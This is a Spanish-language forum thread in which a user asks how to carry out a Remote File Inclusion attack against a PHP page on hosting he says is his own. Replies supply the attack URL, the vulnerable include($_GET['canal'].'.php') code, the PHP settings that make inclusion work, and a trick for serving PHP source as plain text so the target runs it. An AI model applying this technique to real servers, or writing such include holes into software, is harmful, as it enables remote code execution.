Haber, mi intencion es hacerme un RFI (Remote File incluse) a esta dirección:
http://dimitrix.webcindario.com/prueba/index.php
el codigo del index.php es:
<p>Esta web es inCrackeable</p>
<?php
include("$canal.php")
?>
y le quiero hacer un include con este archivo:
http://www.dimitrix.es/canal.php/ que tiene de codigo esto:
<html>
<?php
$fp = fopen("archivo.txt","w+");
fclose($fp);
?>
con esto conseguiri crear un archivo llamado archivo.txt en
http://dimitrix.webcindario.com/prueba/
yo lo hago de la siguiente forma:
http://dimitrix.webcindario.com/prueba/index.php?canal=http://www.dimitrix.es/canal.php
pero como que no me va y me da error, como seria¿?
no es nada ilegal ya q los housting son mios.
Gracias.
La shell no deberia ser, un archivo de texto?. :o
http://dimitrix.webcindario.com/prueba/index.php?canal=http://www.dimitrix.es/canal.txt ????????
Saludos!!
no por que si te fijas el include pide el archivo canal.php
Prueba kitandole el ".php"
del final
ademas debes de tener habilitado global register en ON al igual que allow_url_fopen si no no funcionara
http://dimitrix.webcindario.com/prueba/index.php?canal=http://www.dimitrix.es/canal
saludos
haber para para lo que me has dixo de register ON allow_url:fopen...
seria crear un php.ini y que dentro tenga esto ¿?
register_globals = on
allow_url_fopen = on
Quedaria así ¿?
Se supone que ya tienes el php.ini
Leete esto
http://www.php.net/manual/en/ini.core.php#ini.register-globals
(http://www.php.net/manual/en/ini.core.php#ini.register-globals)
Ponelo asi
<p>Esta web es inCrackeable</p>
<?php
$canal = $_GET['canal'];
include("$canal".".php")
?>
y entonces haces
index.php?canal=http://www.dimitrix.es/canal
nada de nada, pero gracias a todos.
<p>Esta web es inCrackeable</p>
<?php
$canal = $_GET['canal'];
include("$canal".".php")
?>
Aquí podemos incluir cualquier archivo SI y SOLO SI la extensión es .php (esto ya es una restricción). Por lo que si tratamos de incluir un fichero remoto no servirá de nada... (el código será interpretado en el servidor remoto. Es como si le dijeramos a "dimitrix.webcinario" que haga GET http://www.dimitrix.es/canal.php).
Por lo que en este caso tan específico, lo mejor que podemos hacer es incluir archivos .php encontrados en el mismo servidor... tratando de provocar errores y obtener información.
Cita de: Zinc en 10 Abril 2007, 03:10 AM
La shell no deberia ser, un archivo de texto?. :o
http://dimitrix.webcindario.com/prueba/index.php?canal=http://www.dimitrix.es/canal.txt ????????
Saludos!!
Cita de: Universal SAC en 22 Abril 2007, 20:37 PM
Aquí podemos incluir cualquier archivo SI y SOLO SI la extensión es .php (esto ya es una restricción). Por lo que si tratamos de incluir un fichero remoto no servirá de nada... (el código será interpretado en el servidor remoto. Es como si le dijeramos a "dimitrix.webcinario" que haga GET http://www.dimitrix.es/canal.php).
Por lo que en este caso tan específico, lo mejor que podemos hacer es incluir archivos .php encontrados en el mismo servidor... tratando de provocar errores y obtener información.
Os equivocais, mientras el código se encuentre en texto plano no habrá ningún problema...
<?php
echo "<?php
\$fp = fopen(\"archivo.txt\",\"w+\");
fclose(\$fp);
?>";
?>
Cita de: YeIk0s en 22 Abril 2007, 21:59 PM
Os equibocais, mientras el código se encuentre en texto plano no habrá ningún problema...
<?php
echo "<?php
\$fp = fopen(\"archivo.txt\",\"w+\");
fclose(\$fp);
?>";
?>
allow_url_include = On
:o :o :o :o :o
WOOOOOOOOOW!! Jamaz había logrado mostrar código php (texto plano) como resultado de interpretar código php! En serio que esto es muy astuto!!! *****, genial... gracias por la corrección y el ejemplo ;D
creo q el fallo esta en mi@ xq algunas cosas no van como hacer una web/proxy y con el mismo codigo en el de pago si q me va.